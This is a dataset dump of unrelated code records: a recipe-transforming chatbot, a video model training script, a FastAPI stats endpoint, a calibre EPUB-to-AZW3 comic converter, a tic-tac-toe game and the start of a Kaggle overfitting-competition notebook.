\" + str(self.ingredient) + \"\\n\" + \"Quantity: \" + str(self.quantity) + \"\\n\" + \"Unit: \" + str(self.unit) + \"\\n\" + \"Descrips: \" + str(self.descrips) + \"\\n\"\n \n \ndef makePlural(list):\n plural_list = []\n for i in list:\n plural_list.append(i + \"s\")\n return plural_list\n\ndef isFloat(str):\n try:\n float(str)\n return float(str)\n except ValueError:\n return \"NA\"\n\ndef buildIngredient(i_text):\n\n i_class = RecipeIngredient(i_text)\n\n my_regex = \"\\s\\(.*?\\)\"\n new_str = re.sub(my_regex, \"\", i_text)\n\n #checking for commas with descrips\n if \",\" in new_str:\n clause = new_str.split(\", \")\n i_class.descrips.append(clause[1])\n new_str = clause[0]\n\n i_list = new_str.split(\" \")\n # check if its a number first\n\n i_class.quantity = isFloat(i_list[0])\n if i_class.quantity != \"NA\":\n i_list.pop(0)\n\n class_ingredient_list = []\n\n for element in i_list:\n #print(element)\n if element in measures or element in makePlural(measures):\n i_class.unit = element\n elif element in descriptions:\n i_class.descrips.append(element)\n else:\n if element not in conjunction_list:\n class_ingredient_list.append(element)\n\n i_class.ingredient = (\" \").join(class_ingredient_list)\n\n return i_class\n \ndef recipe_ingredients(scraper):\n ingredients = scraper.ingredients()\n #print(ingredients)\n global all_ingredients\n global all_ingredients_text\n all_ingredients_text = []\n all_ingredients = []\n for ing in ingredients:\n # pass \n ing_class = buildIngredient(ing)\n all_ingredients.append(ing_class)\n #print(ing_class.ingredient)\n all_ingredients_text.append(ing_class.ingredient)\n\n return\n\n\ndef DoubleIt(steps_array):\n #print(\"DOUBLING\")\n \n for i in all_ingredients:\n if i.quantity != \"NA\":\n bool = False\n if i.quantity <= 1:\n bool = True\n temp = i.quantity\n i.quantity = temp*2\n #print(\"UPDATED: \" + str(i.quantity))\n if i.quantity > 1 and bool == True:\n if i.unit != \"\":\n i.unit = i.unit + \"s\"\n i.i_text = str(i.quantity) + \" \" + i.unit + \" \" + i.ingredient\n\n for step in steps_array:\n word_list = step.step_text.split(\" \")\n for inx, word in enumerate(word_list):\n if word in measures or any(word in i.ingredient for i in all_ingredients) or word in makePlural(measures):\n prev_word = word_list[inx - 1]\n quant = isFloat(prev_word)\n if quant != \"NA\":\n step.step_text = step.step_text.replace(prev_word, str(quant*2))\n \n\n\ndef HalfIt():\n for i in all_ingredients:\n if i.quantity != \"NA\":\n bool = False\n if i.quantity >= 1:\n bool = True\n temp = i.quantity\n i.quantity = temp/2\n if i.quantity < 1 and bool == True:\n if i.unit != \"\":\n i.unit = i.unit[0:len(i.unit)-1]\n i.i_text = str(i.quantity) + \" \" + i.unit + \" \" + i.ingredient\n \ndef Transform(type, steps_list):\n\n old_ingredients = all_ingredients\n for i in old_ingredients:\n try:\n #print(\"Old Ingredient\")\n #print(i.ingredient)\n replacement = type[i.ingredient]\n j = i.ingredient\n \n\n for step in steps_list:\n #print(step)\n for ing in step.ingredients:\n if replacement not in ing.ingredient:\n if i == ing:\n #print(\"FOUND REPLACEMENT: \" + replacement)\n #print(\"REPLACE: \" + j)\n ing.i_text = ing.i_text.replace(j, replacement)\n step.step_text = step.step_text.replace(j, replacement)\n ing.ingredient = replacement\n #print(\"TRANSFORM STEP\")\n #print(step.step_text)\n except:\n continue\n\n for i in all_ingredients:\n try:\n replacement = type[i.ingredient]\n i.i_text = i.i_text.replace(i.ingredient, replacement)\n i.ingredient = replacement\n except:\n continue\n \n prev_word = \"sdfgh\"\n for step in steps_list:\n word_list = step.step_text.split(\" \")\n for word in word_list:\n word = removePunc(word)\n try:\n replacement = type[word]\n if prev_word not in replacement:\n step.step_text = step.step_text.replace(word, replacement)\n except:\n pass\n prev_word = word\n \n\ndef findIngredient(text):\n for i in all_ingredients:\n if text in i.ingredient:\n return i\n return False\n\n#helper to check if word is already present in a list\ndef checkList(text, list):\n is_present = False\n for element in list:\n if text in element.lower():\n is_present = True\n return is_present\n\ndef setStepFields(step):\n banned_words = [\"heat\", \"sauce\", \"degrees\", \"c\", \"f\", \"temperature\", \"to\", \"a\", \"cheese\", \"-\", \"of\", \"hot\"]\n\n step_text = step.step_text.lower()\n spacy_doc = nlp_spacy(step_text)\n #print(\"STEP: \" + step_text)\n #print(all_ingredients_text)\n\n step_ingredients = []\n step_mats = []\n step_acts = []\n\n for chunk in spacy_doc.noun_chunks:\n #print(\"TEXT: \" + chunk.text, \"ROOT: \" + chunk.root.text, \"ROOT DEP: \" + chunk.root.dep_, \"ROOT HEAD: \" + chunk.root.head.text)\n if chunk.root.text in cooking_utensils:\n step_mats.append(chunk.text)\n step.materials.append(chunk.text)\n if chunk.text in all_ingredients_text:\n if findIngredient(chunk.text) is not False:\n step_ingredients.append(chunk.text)\n step.ingredients.append(findIngredient(chunk.text))\n elif checkList(chunk.root.text, all_ingredients_text) and not any(word in chunk.text for word in banned_words):\n if findIngredient(chunk.text) is not False:\n step_ingredients.append(chunk.text)\n step.ingredients.append(findIngredient(chunk.text))\n\n\n for token in spacy_doc:\n #print(\"TEXT: \" + token.text, \"POS: \" + token.pos_, \"TAG: \" + token.tag_)\n if (token.text in cooking_actions or token.pos_ == \"VERB\") and token.text not in step_acts:\n step_acts.append(token.text)\n step.actions.append(token.text)\n elif token.pos_ == \"NOUN\" and token.text in cooking_utensils:\n if not checkList(token.text, step_mats):\n step_mats.append(token.text)\n step.materials.append(chunk.text)\n elif token.text in all_ingredients_text and not checkList(token.text, step_ingredients):\n # if we are here, we have found an ingredient\n # add the corresponding ingredient object\n #step.ingredients.append(findIngredient(token.text))\n #if not checkList(token.text, step_ingredients):\n \n if findIngredient(token.text) is not False:\n step_ingredients.append(token.text)\n step.ingredients.append(findIngredient(token.text))\n elif checkList(token.text, all_ingredients_text) and token.text not in banned_words and not checkList(token.text, step_ingredients):\n \n if findIngredient(token.text) is not False:\n step_ingredients.append(token.text)\n step.ingredients.append(findIngredient(token.text))\n\n #elif checkList(token.text, all_ingredients_text):\n #step_ingredients.append(token.text)\n \n \n #print(\"STEP MATS: \" + str(step_mats))\n #print(\"STEP INGS: \" + str(step_ingredients))\n #print(\"STEP ACTIONS: \" + str(step_acts))\n\n \n #print('\\n')\n return\n\ndef printSteps(steps_array):\n for i in steps_array:\n print(i)\n i.printStepIng()\n\n\n#builds a step class array\ndef buildStepsArray(scraper):\n #prolly want to keep track of where each action and ingredient falls in the step (later)\n instructions = scraper.instructions_list()\n new_instruction_list = []\n for instruction in instructions:\n new_instruction_list += sent_tokenize(instruction)\n\n\n steps_array = []\n\n for c, element in enumerate(new_instruction_list):\n #print(\"Loading Step \" + str(c+1))\n step = recipeStep(c+1, element)\n setStepFields(step)\n steps_array.append(step)\n\n return steps_array\n\ndef prettyPrint(steps_array):\n print(\"Ingredients:\")\n print(\"______________________________\\n\")\n for i in all_ingredients:\n print(\"\\t - \" + i.i_text)\n print('\\n')\n print(\"______________________________\")\n print(\"\\nDirections:\")\n print(\"______________________________\\n\")\n\n for step in steps_array:\n print(step, \"\\n\")\n \ndef printHelp():\n print(\"\\nThat recipe sounds scrumpdiddlyumptious! Here's the menu of ways you can transform this recipe:\\n\")\n print(\"1) Make it Vegetarian\\n\")\n print(\"2) Take a Vegetarian recipe and make it meaty\\n\")\n print(\"3) Make it Healthy\\n\")\n print(\"4) Take a Healthy recipe and add some good, American, unhealthy flavor!\\n\")\n print(\"5) Give it an Italian spin\\n\")\n print(\"6) Give it a Thai twist\\n\")\n print(\"7) Make it gluten free (and keep Callum alive)\\n\")\n print(\"8) Add some gluten \\n\")\n print(\"9) Make it lactose free\\n\")\n print(\"10) Add some dairy and strengthen those bones\\n\")\n print(\"11) Double the recipe\\n\")\n print(\"12) Half the recipe\\n\")\n print(\"\\nType in one of these numbers to get your meal started!\\n\")\n\ndef runChatbot():\n print(\"Welcome to Recipe Extravaganza 2.0!\\n\")\n booli = True\n while booli:\n try:\n recipe = input(\"Please give me a link to a recipe:\\n\")\n if recipe == \"quit\":\n print(\"Gone so soon? Come back with a recipe, have a nice day.\")\n return\n scraper = scrape_me(recipe, wild_mode = True)\n recipe_ingredients(scraper)\n title = scraper.title()\n steps_array = buildStepsArray(scraper)\n booli = False\n except:\n #print(\"\\nWhat, are you baked? You didn't give us a good link! Please try again\\n\")\n print(\"\\nHmm not sure I can read that link. We recommend you give us a recipe from one of these websites:\\nFoodNetwork.com\\nAllRecipes.com\\nTasteOfHome.com\\nDelish.com\\n\")\n \n printHelp()\n \n while True:\n \n query = input(\"Pick a transform \\n\")\n print('\\n')\n #query = related(query)\n if query == \"1\":\n Transform(meat_to_veg, steps_array)\n title = \"Vegetarian \" + title\n elif query == \"2\":\n Transform(veg_to_meat, steps_array)\n if \"Meatless\" in title:\n title = title.replace(\"Meatless\", \"\")\n if \"Vegetarian\" in title:\n title = title.replace(\"Vegetarian\", \"\")\n title = \"Super Meaty \" + title\n elif query == \"3\":\n Transform(fat_to_health, steps_array)\n title = \"Healthy \" + title\n elif query == \"4\":\n Transform(health_to_fat, steps_array)\n title = \"Nice and Fatty \" + title\n elif query == \"5\":\n Transform(to_italian, steps_array)\n title = \"Italian \" + title\n elif query == \"6\":\n Transform(to_thai, steps_array)\n title = \"Thai \" + title\n elif query == \"7\":\n Transform(to_gluten_free, steps_array)\n title = \"Gluten free \" + title\n elif query == \"8\":\n Transform(gluten_free_to_gluten, steps_array)\n if \"Gluten Free\" in title:\n title = title.replace(\"Gluten Free\", \"\")\n title = \"Now with gluten \" + title\n elif query == \"9\":\n Transform(to_lactose_free, steps_array)\n title = \"Dairy free \" + title\n elif query == \"10\":\n Transform(lactose_free_to_dairy, steps_array)\n title = \"Now with dairy \" + title\n elif query == \"11\":\n DoubleIt(steps_array)\n elif query == \"12\":\n HalfIt()\n \n print(\"______________________________\\n\")\n print(\"New Transformed Recipe:\")\n print(title)\n print(\"______________________________\")\n print(\"______________________________\\n\")\n prettyPrint(steps_array)\n\n check = 3\n while check == 3:\n query2 = input(\"Do you want to perform another transformation to this already transformed recipe? (Yes/No)\\n\")\n if query2.lower() == \"yes\":\n break\n elif query2.lower() == \"no\":\n print(\"Enjoy your new recipe! See you soon.\")\n check = 2\n else:\n print(\"I didn't understand that, please type yes or no.\")\n check = 3\n \n if check == 2:\n break\n\nif __name__ == \"__main__\":\n\n preprocessSpacy()\n\n # link = to_meat_link\n # scraper = scrape_me(link, wild_mode = True)\n\n\n # recipe_ingredients(scraper)\n # #print(all_ingredients_text)\n\n # steps_array = buildStepsArray(scraper)\n\n # Transform(veg_to_meat, steps_array)\n\n #printSteps(steps_array)\n\n runChatbot()\n\n #for i in all_ingredients:\n # print(i)\n\n #for i in all_ingredients:\n # print(i)\n\n\n #print(\"START OF TRANFROM STEPS\")\n #printSteps(steps_array)\n\n #for i in all_ingredients:\n # print(i)\n \n\n #for i in all_ingredients:\n # if i.ingredient == \"onion\":\n # i.ingredient = \"FUCKER\"\n\n #printSteps(steps_array)\n\n \n #print(\"VEGETARIAN TRANSFORM\")\n\n #for i in all_ingredients:\n #print(i)\n\n #print(\"DOUBLING RECIPE\")\n #DoubleIt(all_ingredients)\n\n #for i in all_ingredients:\n\n # print(i)\n\n","repo_name":"cbondy100/recipe_transformer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25494,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13905049852","text":"# @Author: Enea Duka\n# @Date: 5/3/21\nfrom dataloaders.kinetics_loader import KineticsDataset\nfrom dataloaders.oops_ttibua_loader import OopsTtibua\nfrom torch.utils.data import DataLoader\n\nfrom models.pm_vtn import create_model\nfrom models.res3d_18 import create_r3d\nfrom transformer2x.vtn import create_model_trn_2x\nfrom rep_learning.train import train\nfrom utils.logging_setup import setup_logger_path\nfrom utils.arg_parse import opt\nfrom datetime import datetime\nimport warnings\n\n\ndef learn_representation():\n\n opt.sfx = str(\n \"%s.rep_learning.tag:%s.layers%d.attn_win%d.classes%d_rok_class_per_trn.task_%s\"\n % (\n opt.dataset,\n opt.tag,\n opt.num_hidden_layers,\n opt.attention_window[0],\n opt.num_classes,\n opt.task,\n )\n )\n\n opt.viz_env = \"%s.%s%s_%s.\" % (\n opt.model_name,\n opt.temp_learning_dataset_name,\n opt.env_pref,\n opt.sfx,\n )\n opt.sfx = str(\n \"%s.rep_learning.tag:%s.layers%d.attn_win%d.classes%d.time%s\"\n % (\n opt.dataset,\n opt.tag,\n opt.num_hidden_layers,\n opt.attention_window[0],\n opt.num_classes,\n datetime.now().strftime(\"%Y%m%d-%H%M%S\"),\n )\n )\n if opt.debug:\n opt.num_workers = 0\n opt.batch_size = 5\n opt.save_model = False\n opt.epochs = 1\n opt.viz = False\n\n setup_logger_path()\n\n train_set, val_set, test_set = None, None, None\n if opt.dataset == \"kinetics\":\n train_set = KineticsDataset(\n \"train\",\n fps=25,\n fpc=32,\n spat_crop=True,\n hflip=False,\n norm_statistics={\n \"mean\": [0.43216, 0.394666, 0.37645],\n \"std\": [0.22803, 0.22145, 0.216989],\n },\n feat_ext=True,\n data_level=opt.rep_data_level,\n feat_set=\"%s_feats\" % opt.rep_backbone,\n )\n val_set = KineticsDataset(\n \"val\",\n fps=25,\n fpc=32,\n spat_crop=True,\n hflip=False,\n norm_statistics={\n \"mean\": [0.43216, 0.394666, 0.37645],\n \"std\": [0.22803, 0.22145, 0.216989],\n },\n feat_ext=True,\n data_level=opt.rep_data_level,\n feat_set=\"%s_feats\" % opt.rep_backbone,\n )\n elif opt.dataset == \"rareact\":\n pass\n elif opt.dataset == \"oops\":\n pass\n elif opt.dataset == \"all\":\n train_set = OopsTtibua(\n \"train\",\n spat_scale=True,\n size=224,\n spat_crop=True,\n load_frames=True if opt.backbone == \"r3d_18\" else False,\n )\n val_set = OopsTtibua(\n \"val\",\n spat_scale=True,\n size=224,\n spat_crop=True,\n load_frames=True if opt.backbone == \"r3d_18\" else False,\n )\n\n if opt.dataset == \"all\":\n train_loader = DataLoader(\n train_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=True,\n drop_last=True,\n collate_fn=train_set.speed_and_motion_collate_fn\n if not opt.multi_scale\n else train_set.video_level_speed_and_motion_collate_fn,\n )\n\n val_loader = DataLoader(\n val_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=False,\n drop_last=True,\n collate_fn=val_set.speed_and_motion_collate_fn\n if not opt.multi_scale\n else train_set.video_level_speed_and_motion_collate_fn,\n )\n else:\n train_loader = DataLoader(\n train_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=False if opt.debug else True,\n drop_last=True,\n collate_fn=train_set._rep_lrn_collate_fn,\n )\n\n val_loader = DataLoader(\n val_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=False if opt.debug else True,\n drop_last=True,\n collate_fn=val_set._rep_lrn_collate_fn,\n )\n\n if opt.multi_scale:\n model, optimizer, loss = create_model_trn_2x(\n opt.num_classes, pretrained=opt.pretrained, pretrain_scale=\"frame\"\n )\n else:\n if opt.backbone == \"vit_longformer\":\n model, optimizer, loss = create_model(\n opt.num_classes, pretrained=opt.pretrained\n )\n elif opt.backbone == \"r3d_18\":\n model, optimizer, loss = create_r3d(pretrained=opt.pretrained)\n\n epoch = 0\n\n # if opt.pretrained:\n # saved_model = torch.load(opt.vtn_ptr_path)\n # optimizer.load_state_dict(saved_model['optimizer'])\n # epoch = saved_model['epoch'] + 1\n\n # opt.batch_size = 256\n # opt.workers = 32\n # opt.balance_fails_only = True\n # opt.all_fail_videos = False\n # # train_loader = get_video_loader(opt)\n # opt.val = True\n # opt.fails_path = '/BS/unintentional_actions/nobackup/oops/oops_dataset/oops_video'\n # val_loader_class = get_video_loader(opt)\n # opt.batch_size = 32\n\n train(\n model=model,\n train_loader=train_loader,\n val_loader=val_loader,\n optimizer=optimizer,\n loss=loss,\n test_freq=1,\n epochs=25,\n train_set=train_set,\n epoch=epoch,\n )\n\n return\n\n\nif __name__ == \"__main__\":\n warnings.filterwarnings(\"ignore\")\n\n learn_representation()\n","repo_name":"dukaenea/unintentional_actions","sub_path":"rep_learning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30113378441","text":"import os\nimport datetime\n\nimport psutil\nimport asyncpg\nimport platform\nfrom fastapi import APIRouter\nfrom dotenv import load_dotenv\n\nfrom utils import get_lines, db_conn\n\nload_dotenv()\n\ndb_url = os.environ[\"DATABASE_URL\"]\n\nUPTIME = datetime.datetime.now()\n\n# Title for docs\ntags_metadata = [\n {\n \"name\": \"Stats\",\n }\n]\n\nstats = APIRouter(tags=tags_metadata)\n\nasync def get_uptime():\n time_right_now = datetime.datetime.now()\n seconds = int((time_right_now - UPTIME).total_seconds())\n time = f\"{seconds}s\"\n if seconds > 60:\n minutes = seconds - (seconds % 60)\n seconds = seconds - minutes\n minutes = int(minutes / 60)\n time = f\"{minutes}min {seconds}s\"\n if minutes > 60:\n hoursglad = minutes - (minutes % 60)\n hours = int(hoursglad / 60)\n minutes = minutes - (hours*60)\n time = f\"{hours}h {minutes}min {seconds}s\"\n\n return time\n\n\nasync def get_stats_from_db():\n\n async with db_conn(db_url) as connection:\n\n data = await connection.fetch(\"SELECT * FROM Stats\")\n\n return_dict = {\n\n }\n\n for record in data:\n return_dict[record[0]] = record[1]\n\n return return_dict\n\n\n@stats.get(\"/stats/\")\nasync def get_stats():\n \n time = await get_uptime()\n\n stat_data = await get_stats_from_db() \n \n\n system_data = {\n \"memory\" : f'{psutil.virtual_memory().percent}%',\n \"running_on\" : f\"{platform.system()} {platform.release()}\",\n \"python_version\" : f\"{platform.python_version()}\",\n \"cpu\" : f'{psutil.cpu_percent()}%'\n }\n \n return {\n \"uptime\" : time,\n \"stats\" : stat_data,\n \"system_stats\" : system_data,\n \"lines\" : (await get_lines())\n }","repo_name":"songkq/FusionSidsAPI","sub_path":"routers/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41674546623","text":"#! /usr/bin/calibre-debug\n\nfrom calibre.ebooks.oeb.base import Manifest, Metadata, xpath\nfrom calibre.ebooks.oeb.polish.container import get_container\nfrom calibre.ebooks.mobi.writer2.resources import Resources\nfrom calibre.ebooks.mobi.writer8.main import KF8Writer\nfrom calibre.ebooks.mobi.writer8.mobi import KF8Book\nfrom calibre.ebooks.mobi.writer8.exth import EXTH_CODES\nfrom calibre.ebooks.oeb.reader import OEBReader\n\nimport sys\nfrom os import path\n\namzn_exth_codes = {\n u'fixed-layout': 122,\n u'book-type': 123,\n u'orientation-lock': 124,\n u'KF8_Count_of_Resources_Fonts_Images': 125,\n u'original-resolution': 126,\n u'zero-gutter': 127,\n u'zero-margin': 128,\n u'KF8_Masthead/Cover_Image': 129,\n u'RegionMagnification': 132,\n u'CoverOffset': 201,\n u'ThumbOffset': 202,\n u'Fake Cover': 203,\n u'Language': 524,\n u'primary-writing-mode': 525,\n u'542':542,\n u'547': 547,\n}\n\ncomic_book_exth_values = {\n 'fixed-layout': 'true',\n 'book-type': 'comic',\n 'orientation-lock': 'portrait',\n 'original-resolution': '960x1280',\n 'zero-gutter': 'true',\n 'zero-margin': 'true',\n 'KF8_Count_of_Resources_Fonts_Images': 0,\n '547': 'InMemory'\n}\n\ndef patch_exth_codes():\n for c in amzn_exth_codes:\n if EXTH_CODES.has_key(c):\n print ('EXTH code already defined: ', c)\n EXTH_CODES[c] = amzn_exth_codes[c]\n\ndef dump_metadata(metadata):\n for k in metadata:\n for item in metadata[k]:\n print ('{}: {}'.format(k, item))\n\n\ndef fixup_metadata(oeb):\n metadata = Metadata(oeb)\n for k in oeb.metadata:\n v = oeb.metadata[k]\n if k in ['contributor']:\n print ('Stripping {}: {}'.format(k, v))\n continue\n for i in v:\n if k=='language' and i.value=='eng':\n metadata.add(k, 'en')\n else:\n metadata[k].append(i)\n\n for k,v in comic_book_exth_values.items():\n metadata.add(k,v)\n\n oeb.metadata = metadata\n oeb.metadata.add('subject', 'Comics')\n\n \ndef create_kf8_book(oeb, opts, resources):\n\n # I need to know to text_length without CSS\n class DummyKF8Writer(KF8Writer):\n def extract_css_into_flows(self):\n pass\n\n dummy_writer = DummyKF8Writer(oeb, opts, resources)\n writer = KF8Writer(oeb, opts, resources)\n book = KF8Book(writer, for_joint=False)\n\n # This gets written to the MOBI header\n book.text_length = dummy_writer.text_length\n\n dump_metadata(book.metadata)\n return book\n\n\ndef set_cover_image(oeb):\n if oeb.metadata['cover']:\n print (oeb.metadata['cover'])\n else:\n cover = None\n for h, item in oeb.manifest.hrefs.items():\n if item.id in [ 'cover-image', 'x_cover-image' ]:\n if not cover or item.id == 'cover-image':\n cover = item.id\n print ('Detected cover: {} href={}'.format(item.id, h))\n\n if cover:\n oeb.metadata.add('cover', cover)\n\n\ndef opf_to_book(opf, outpath, container):\n from calibre.ebooks.conversion.plumber import Plumber, create_oebbook\n class Item(Manifest.Item):\n def _parse_css(self, data):\n # The default CSS parser used by oeb.base inserts the h namespace\n # and resolves all @import rules. We dont want that.\n return container.parse_css(data)\n def specialize(oeb):\n oeb.manifest.Item = Item\n\n plumber = Plumber(opf, outpath, container.log)\n plumber.setup_options()\n\n class Reader(OEBReader):\n def _metadata_from_opf(self, opf):\n for e in xpath(opf, 'o2:metadata//o2:meta'):\n if e.attrib.get('name') == 'original-resolution':\n comic_book_exth_values['original-resolution'] = e.attrib.get('content', '660x800')\n return OEBReader._metadata_from_opf(self, opf)\n\n\n oeb = create_oebbook(container.log, opf, plumber.opts, specialize=specialize, reader=Reader)\n\n fixup_metadata(oeb)\n set_cover_image(oeb)\n\n plumber.opts.dont_compress = True\n plumber.opts.toc_title = None\n plumber.opts.mobi_toc_at_start = False\n plumber.opts.no_inline_toc = True\n plumber.opts.mobi_periodical = False\n\n res = Resources(oeb, plumber.opts, False, process_images=False)\n \n if path.splitext(outpath)[1] != '.azw3':\n plumber.run()\n else:\n book = create_kf8_book(oeb, plumber.opts, res) \n book.opts.prefer_author_sort = False\n book.opts.share_not_sync = False\n print ('\\nWriting out: {}\\n'.format(outpath))\n book.write(outpath)\n\n\ndef epub_to_book(epub, outpath=None):\n container = get_container(epub, tweak_mode=True)\n outpath = outpath or (epub.rpartition('.')[0] + '.azw3')\n opf_to_book(container.name_to_abspath(container.opf_name), outpath, container)\n\n\ndef extract_mobi(mobi_path, extract_to):\n from calibre.ebooks.mobi.debug.main import inspect_mobi\n inspect_mobi(mobi_path, ddir=extract_to)\n\n\ndef main(argv=sys.argv):\n\n input_path = argv[1]\n if input_path.endswith('.mobi'):\n extract_mobi(input_path, path.splitext(input_path)[0] + '_extracted_mobi')\n else:\n if len(argv) > 2:\n output_path = argv[2]\n else:\n if path.isdir(input_path):\n output_path = input_path.replace('-epub', '.azw3').strip('/')\n else:\n output_path = path.splitext(input_path)[0] + '.azw3'\n\n patch_exth_codes()\n epub_to_book(input_path, output_path)\n\nif __name__ == '__main__':\n main()\n","repo_name":"cristivlas/epub-comics","sub_path":"epub_to_azw3_comic.py","file_name":"epub_to_azw3_comic.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20268148017","text":"#Создайте программу для игры в \"\"Крестики-нолики\"\".\nmaps = [1,2,3,\n 4,5,6,\n 7,8,9]\n \n\nshablon = [[0,1,2],\n [3,4,5],\n [6,7,8],\n [0,3,6],\n [1,4,7],\n [2,5,8],\n [0,4,8],\n [2,4,6]]\n \n\ndef print_maps():\n print(maps[0], end = \" \")\n print(maps[1], end = \" \")\n print(maps[2])\n \n print(maps[3], end = \" \")\n print(maps[4], end = \" \")\n print(maps[5])\n \n print(maps[6], end = \" \")\n print(maps[7], end = \" \")\n print(maps[8]) \n \ndef step_maps(step,symbol):\n ind = maps.index(step)\n maps[ind] = symbol\n \ndef get_result():\n win = \"\"\n \n for i in shablon:\n if maps[i[0]] == \"X\" and maps[i[1]] == \"X\" and maps[i[2]] == \"X\":\n win = \"X\"\n if maps[i[0]] == \"O\" and maps[i[1]] == \"O\" and maps[i[2]] == \"O\":\n win = \"O\" \n \n return win\n\nplayer1 = 1\ncount = 9\nwhile count > 0:\n print_maps()\n if player1 == 1:\n symbol = \"X\"\n step = int(input(\"Х, ваш ход: \"))\n else:\n symbol = \"O\"\n step = int(input(\"О, ваш ход: \"))\n \n step_maps(step,symbol) # делаем ход в указанную ячейку\n win = get_result() # определим победителя\n count -= 1\n if win != \"\":\n break\n player1 = not(player1) \n\nprint_maps()\nif win ==\"\":\n print(\"ничья\")\nelse:\n print(\"Победил\", win)\n\n","repo_name":"Andrey211263/DZ_Sem05","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10147372605","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# > **Problem overview**\n# \n# Long ago, in the distant, fragrant mists of time, there was a competition...\n# \n# It was not just any competition. It was a competition that challenged mere mortals to model a 20,000x200 matrix of continuous variables using only 250 training samples... without overfitting. Data scientists ― including Kaggle's very own Will Cukierski ― competed by the hundreds. Legends were made. (Will took 5th place, and eventually ended up working at Kaggle!) People overfit like crazy. It was a Kaggle-y, data science-y madhouse.\n# \n# So... we're doing it again.\n# \n# This is the next logical step in the evolution of weird competitions. Once again we have 20,000 rows of continuous variables, and a mere handful of training samples. Once again, we challenge you not to overfit. Do your best, model without overfitting, and add, perhaps, to your own legend. In addition to bragging rights, the winner also gets swag. Enjoy!\n# \n# Interesting article:\n# * https://machinelearningmastery.com/roc-curves-and-precision-recall-curves-for-classification-in-python/\n\n# In[ ]:\n\n\n# import data manipulation library\nimport numpy as np\nimport pandas as pd\n\n# import data visualization library\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# import pystan model class\nimport pystan\n\n# import sklearn data preprocessing\nfrom sklearn.preprocessing import RobustScaler\n\n# import sklearn model class\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\n# import sklearn model selection\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n# import sklearn model evaluation classification metrics\nfrom sklearn.metrics import accuracy_score, auc, classification_report, confusion_matrix, f1_score, fbeta_score, precision_recall_curve, precision_score, recall_score, roc_auc_score, roc_curve\n\n# > **Acquiring training and testing data**\n# \n# We start by acquiring the training and testing datasets into Pandas DataFrames.\n\n# In[ ]:\n\n\n# acquiring training and testing data\ndf_train = pd.read_csv('../input/train.csv')\ndf_test = pd.read_csv('../input/test.csv')\n\n# In[ ]:\n\n\n# visualize head of the training data\ndf_train.head(n=5)\n\n# In[ ]:\n\n\n# visualize tail of the testing data\ndf_test.tail(n=5)\n\n# In[ ]:\n\n\n# combine training and testing dataframe\ndf_train['datatype'], df_test['datatype'] = 'training', 'testing'\ndf_test.insert(1, 'target', np.nan)\ndf_data = pd.concat([df_train, df_test], ignore_index=True)\n\n# > **Feature exploration, engineering and cleansing**\n# \n# Here we generate descriptive statistics that summarize the central tendency, dispersion and shape of a dataset’s distribution together with exploring some data.\n\n# In[ ]:\n\n\n# countplot function plot - categorical variable (x-axis) vs. categorical variable (y-axis)\ndef countplot(x = None, y = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n for i, v in enumerate(x): sns.countplot(x=v, hue=y, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# boxplot function plot - categorical variable (x-axis) vs. numerical variable (y-axis)\ndef boxplot(cat = None, num = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n if type(cat) == list:\n for i, v in enumerate(cat): sns.boxplot(x=v, y=num, data=data, ax=axes[i])\n else:\n for i, v in enumerate(num): sns.boxplot(x=cat, y=v, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# swarmplot function plot - categorical variable (x-axis) vs. numerical variable (y-axis)\ndef swarmplot(cat = None, num = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n if type(cat) == list:\n for i, v in enumerate(cat): sns.swarmplot(x=v, y=num, data=data, ax=axes[i])\n else:\n for i, v in enumerate(num): sns.swarmplot(x=cat, y=v, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# violinplot function plot - categorical variable (x-axis) vs. numerical variable (y-axis)\ndef violinplot(cat = None, num = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n if type(cat) == list:\n for i, v in enumerate(cat): sns.violinplot(x=v, y=num, data=data, ax=axes[i])\n else:\n for i, v in enumerate(num): sns.violinplot(x=cat, y=v, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# scatterplot function plot - numerical variable (x-axis) vs. numerical variable (y-axis)\ndef scatterplot(x = None, y = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = 